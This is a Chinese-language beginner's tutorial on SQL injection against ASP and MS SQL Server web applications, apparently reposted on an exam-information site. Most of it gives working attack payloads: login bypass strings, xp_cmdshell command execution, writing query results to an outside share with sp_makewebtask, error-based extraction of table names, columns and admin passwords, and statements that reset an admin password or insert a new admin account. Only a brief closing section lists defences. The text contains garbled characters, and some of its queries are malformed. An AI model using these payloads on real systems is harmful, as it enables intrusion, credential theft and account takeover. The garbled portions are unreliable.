這篇文章目的是讓初學(xué)者利用SQL注入技術(shù)來解決他們面臨的問題, 成功的使用它們,并在這種攻擊中保護自己.
1.0 介紹
當(dāng)一臺機器只打開了80端口, 你最依賴的漏洞掃描器也不能返回任何有用的內(nèi)容, 并且你知道管理員經(jīng)常為機器打補丁, 我們就不得不使用web攻擊方式了. SQL注入是web攻擊的一種類型 ,這種方式只需要開放80端口就夠了并且即使管理員打了全部的補丁也能工作. 它攻擊的目標(biāo)是web程序(像ASP,JSP,PHP,CGI等)本身而不是web服務(wù)器或系統(tǒng)上運行的服務(wù).
本文不介紹任何新的東西, SQL注入已經(jīng)被廣泛的討論和使用. 我們寫這篇文章目的是因為我們想要使用SQL注入進行一些演練測試,希望這個能對各位有用. 你可以在這里找到一兩個竅門但是請你關(guān)注下”9.0 哪里有更多的信息?” 可以得到關(guān)于SQL注入更多����,更深入的技術(shù).
1.1 什么是SQL注入?
通過網(wǎng)頁的輸入項來注入SQL查詢或命令是一種技巧。許多網(wǎng)頁會從用戶那里獲取參數(shù)���,并構(gòu)建SQL查詢來訪問數(shù)據(jù)庫�。以用戶登錄為例�,頁面收集用戶名和密碼然后構(gòu)建SQL去查詢數(shù)據(jù)庫,來校驗用戶名和密碼的有效性�。通過SQL注入����,我們可以發(fā)送經(jīng)過精心編造的用戶名和/或密碼字段���,來改變SQL查詢語句并賦予 我們其它一些權(quán)限。
1.2 你需要什么?
任意web瀏覽器�。
2.0 你應(yīng)該尋找什么?
嘗試尋找那些允許你提交數(shù)據(jù)的頁面���,即: 登錄頁面,查詢頁面,反饋信息等等�。有時�,HTML頁面會用POST命令來把參數(shù)發(fā)送到另外一個ASP頁面上去����。那么,你可能在URL中看不到參數(shù)���。不過,你可以查看頁面的HTML源代碼����,查找”FORM”標(biāo)簽。你會在一些HTML源代碼中看到類似下面的東東:
1
<FORM action=Search/search.asp method=post>
2
<input type=hidden name=A value=C>
3
</FORM>
位于<FORM>和</FORM>之間的所有內(nèi)容都可能暗含著有用的參數(shù)(利用你的智慧)�。
2.1 如果你找不到任何帶有輸入框的頁面怎么辦?
你應(yīng)該尋找諸如ASP, JSP, CGI, 或 PHP這樣的頁面���。尤其要找那些攜帶有參數(shù)的 URL����,比如:
3.0 如何測試它是否是易受攻擊的?
從一個單引號技巧開始����。輸入類似這樣的內(nèi)容:
hi’ or 1=1–
到登錄頁面中,或者密碼中�,甚至直接在URL中����。例如:
- Login: hi’ or 1=1–
- Pass: hi’ or 1=1–
- http://duck/index.asp?id=hi’ or 1=1–
假如你必須在一個hidden字段中來這樣做,就把HTML源代碼下載下來����,保存到硬盤上���,修改URL和相應(yīng)的 hidden字段���。例如:
1
<FORM action=http://duck/Search/search.asp method=post>
2
<input type=hidden name=A value="hi' or 1=1--">
3
</FORM>
如果夠幸運���,不需要任何用戶名和密碼你就可以登錄�。
3.1 為什么是 ‘ or 1=1–?
讓我們通過另外一個例子來展示’ or 1=1– 的重要性���。除了能繞過“登錄”驗證,它還能展示一些在正常情況下很難看到的額外信息。假設(shè)�,有一個ASP頁面����,其功能是將我們導(dǎo)航到下面的URL:
在URL中���,’category’是變量名���;food是賦給變量的值���。為了完成導(dǎo)航功能����,我們猜想ASP頁面應(yīng)該包含下面的代碼(這些代碼是我們?yōu)榱送瓿纱藴y試而編寫的真實代碼):
1
v_cat = request("category")
2
sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
3
set rs=conn.execute(sqlstr)
如上所示�,變量v_cat獲取了參數(shù)category的值�,SQL語句將變成:
1
SELECT * FROM product WHERE PCategory='food'
該SQL語句將返回符合where條件的的結(jié)果集。在本例中,where條件是PCategory=’food’ 。
下面,假設(shè)我們將URL改成下面的形式:
or 1=1–
現(xiàn)在�,變量v_cat等于”food’ or 1=1– “����。將變量v_cat在SQL中進行替換�,我們將得到下面語句:
1
SELECT * FROM product WHERE PCategory='food' or 1=1--'
該語句將得到product表中所有記錄���,無論PCategory是否等于’food’�。“–”告訴MS SQL server忽略其后面的所有內(nèi)容(筆者注:其實可以理解為注釋�,“–”后面所有的內(nèi)容都為注釋)���,方便我們處理單引號�。在某些情況下���,”–”可以被替換成”#“�。
如果后臺的數(shù)據(jù)庫不是SQL Server,查詢語句的單引號就不能被忽略�。在這種情況下����,我們可以嘗試下面的查詢條件:
‘ or ‘a(chǎn)’='a
此時,SQL語句將變成:
1
SELECT * FROM product WHERE PCategory='food' or 'a'='a'
根據(jù)真實的SQL語句����,我們還可以嘗試以下各種變形:
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a(chǎn)’='a
” or “a”=”a
‘) or (‘a(chǎn)’='a
4.0 我如何通過SQL注入來進行遠程執(zhí)行?
能夠注入SQL命名通常意味著我們可以隨意執(zhí)行任何SQL查詢�。默認安裝的MS SQL 服務(wù)是作為SYSTEM來運行的, 它相當(dāng)于 Windows系統(tǒng)中的Administrator����。我們可以利用存儲過程���,比如master..xp_cmdshell 來進行遠程執(zhí)行:
‘; exec master..xp_cmdshell ‘ping 10.10.1.2′–
如果單引號(‘)不管用���,可以試試雙引號 (“)���。
分號會終止當(dāng)前的SQL查詢,這就允許你開始一個新的SQL命名。要驗證命令是否執(zhí)行成功,你需要監(jiān)聽來自10.10.1.2的ICMP數(shù)據(jù)包����,檢查是否收到來自服務(wù)器的數(shù)據(jù)包:
#tcpdump icmp
如果你沒有收到任何來自服務(wù)器的ping請求����,并且收到了暗示許可錯誤的信息����,則有可能是管理員限制了Web用戶對存儲過程的訪問。
5.0 如何獲取SQL查詢的輸出?
可以通過使用sp_makewebtask把你的查詢寫入到HTML:
‘; EXEC master..sp_makewebtask “\\10.10.1.3\share\output.html”, “SELECT * FROM INFORMATION_SCHEMA.TABLES”
注意這個目標(biāo)IP的文件夾”share”的共享權(quán)限是Everyone.
6.0 如何從數(shù)據(jù)庫的ODBC錯誤消息中獲取數(shù)據(jù)?
我們幾乎可以在MS SQL服務(wù)器產(chǎn)生的錯誤消息中得到任何我們想要的數(shù)據(jù). 通過類似下面的這個地址:
我們將試圖把這個整數(shù)’10′和另外的字符串進行UNION聯(lián)合操作:
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–
系統(tǒng)表 INFORMATION_SCHEMA.TABLES 包含了服務(wù)器上所有表的信息. 這個TABLE_NAME 字段包含數(shù)據(jù)庫中每個表的字段. 這樣就不存在無此表無此字段的問題了. 看我們的查詢語句:
1
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-
這個語句將會返回數(shù)據(jù)庫中第一個表的名字. 當(dāng)我們使用這個字符串值和一個數(shù)字’10′進行UNION操作, MS SQL 服務(wù)器將會試圖轉(zhuǎn)換這個字符串(nvarchar)為一個數(shù)字. 這會產(chǎn)生一個錯誤, 因為我們不能把nvarchar類型轉(zhuǎn)換成數(shù)字. 服務(wù)器將會產(chǎn)生以下錯誤信息:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘table1′ to a column of data type int.
/index.asp, line 5
這個錯誤消息清楚的告訴我們這個值不能轉(zhuǎn)換為數(shù)字. 同時呢,里面也包含了數(shù)據(jù)庫中第一個表的名字 ,就是”table1″.
想獲取下一個表的名字,我們使用下面的語句:
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (‘table1′)–
我們也可以使用LIKE關(guān)鍵詞來搜索數(shù)據(jù):
UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ‘%25login%25′–
輸出:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘a(chǎn)dmin_login’ to a column of data type int.
/index.asp, line 5
這個匹配, ‘%25login%25′ 的結(jié)果和 %login% 是一樣的在SQL Server服務(wù)器中.這樣,我們將得到 匹配的第一個表的名字, “admin_login”.
6.1 如何挖掘到表所有列的名稱?
我們可以使用另一個非常有用的表INFORMATION_SCHEMA.COLUMNS 來標(biāo)出某一個的表所有列名:
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’–
輸出:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_id’ to a column of data type int.
/index.asp, line 5
注意錯誤提示,里面已經(jīng)包含了第一個列名, 下面我們使用NOT IN ()來取得下一個列的名稱:
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (‘login_id’)–
輸出:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_name’ to a column of data type int.
/index.asp, line 5
按上面的步驟繼續(xù)下一個,我們就能獲得剩下的所有列的名稱, 即”password”, “details”等列. 當(dāng)我們得到下面的這個錯誤提示時,就表示我們已經(jīng)找出所有的列名了.
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (‘login_id’,'login_name’,'password’,details’)–
輸出:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
/index.asp, line 5
6.2 如何檢索到我們想要的數(shù)據(jù)?
現(xiàn)在我們已經(jīng)確認了一些重要的表�,以及它們的列名,我們可以用同樣的技巧從數(shù)據(jù)庫中挖掘任何我們想要的信息.
現(xiàn)在,讓我們從這個”admin_login”表中得到第一個login_name的值吧:
UNION SELECT TOP 1 login_name FROM admin_login–
輸出:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘neo’ to a column of data type int.
/index.asp, line 5
根據(jù)上面的錯誤提示我們知道這里有一個管理員的登錄名是”neo”.下面,我們從數(shù)據(jù)庫中到”neo”的密碼:
UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’–
Output:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘m4trix’ to a column of data type int.
/index.asp, line 5
密碼就在錯誤提示里了,現(xiàn)在讓我們用”neo”和密碼”m4trix”登錄試試吧.
6.3 如何獲取數(shù)字型字符串的值����?
上面所述的技術(shù)具有局限性���。在我們試圖轉(zhuǎn)換包含有效數(shù)字(即只是0-9之間的字符)的時候����,我們沒有得到任何錯誤信息����。讓我們試著獲取”trinity”的密碼”31173″:
UNION SELECT TOP 1 password FROM admin_login where login_name=’trinity’
我們可能得到”此頁面不存在“的錯誤。原因在于:在于整數(shù)(這時是10)聯(lián)接之前����,密碼”31173″將轉(zhuǎn)換為一個數(shù)字�。由于這是一個有效地聯(lián)接(UNION)語句����,因此SQL Server不會拋出ODBC錯誤信息,因此我們將不能獲取到任何數(shù)字型的項。
為了解決這個問題�,我們給數(shù)字型字符串后面提交一些字母����,這樣可以確保轉(zhuǎn)換失效����。讓我們看看下面這個查詢:
UNION SELECT TOP 1 convert(int, password%2b’%20morpheus’) FROM admin_login where login_name=’trinity’
我們只是給我們需要的密碼文本后添加了加號(+)。(“+”的ASCII編碼是0x2b)。我們將給真正的密碼后添加“(空格)休眠符“���。因此,即使我們有一個字符型字符串”31173“,它最終將變?yōu)椤?1173休眠符“�。通過手工調(diào)用convert()函數(shù)試圖把“31173休眠符“轉(zhuǎn)換為整數(shù)時�,SQL Server拋出ODBC錯誤信息:
Microsoft OLE DB Provider for ODBC Drivers error ’80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’31173 morpheus’ to a column of data type int.
/index.asp, line 5
現(xiàn)在���,你就可以使用密碼為”31173″的”trinity”用戶登陸了�。
7.0 如何向數(shù)據(jù)庫中更新或插入數(shù)據(jù)?
當(dāng)我們成功的獲取到一張表的所有字段名后����,我們就有可能UPDATE甚至INSERT一條新記錄到該表中����。例如���,修改”neo”的密碼:
; UPDATE ‘a(chǎn)dmin_login’ SET ‘password’ = ‘newpas5′ WHERE login_name=’neo’–
下面INSERT一條新記錄到數(shù)據(jù)庫中:
; INSERT INTO ‘a(chǎn)dmin_login’ (‘login_id’, ‘login_name’, ‘password’, ‘details’) VALUES (666,’neo2′,’newpas5′,’NA’)–
現(xiàn)在我們可以用用戶名”neo2″和密碼”newpas5″來登錄了����。
8.0 如何避免SQL注入?
過濾參數(shù)中的單引號�、雙引號�、斜杠����、反斜杠、分號等字符;以及NULL�、回車符�、換行符等擴展字符�。這些參數(shù)可能來自于:
前臺表單(form)中的用戶輸入
URL中的參數(shù)
cookie
對于數(shù)字,在將其傳入SQL語句之前將其從字符串(String)轉(zhuǎn)換成數(shù)字(Number);或者用ISNUMERIC函數(shù)確定其確實是數(shù)字。
將SQL Server的運行用戶修改為低權(quán)限用戶(low privilege user)。
刪除不再需要的存儲過程�,例如:master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
更多信息請查看IT技術(shù)專欄
由于各方面情況的不斷調(diào)整與變化�,易賢網(wǎng)提供的所有考試信息和咨詢回復(fù)僅供參考����,敬請考生以權(quán)威部門公布的正式信息和咨詢?yōu)闇?zhǔn)!
公眾號
事業(yè)單位
當(dāng)前位置:
公考類
招聘類
各類考試
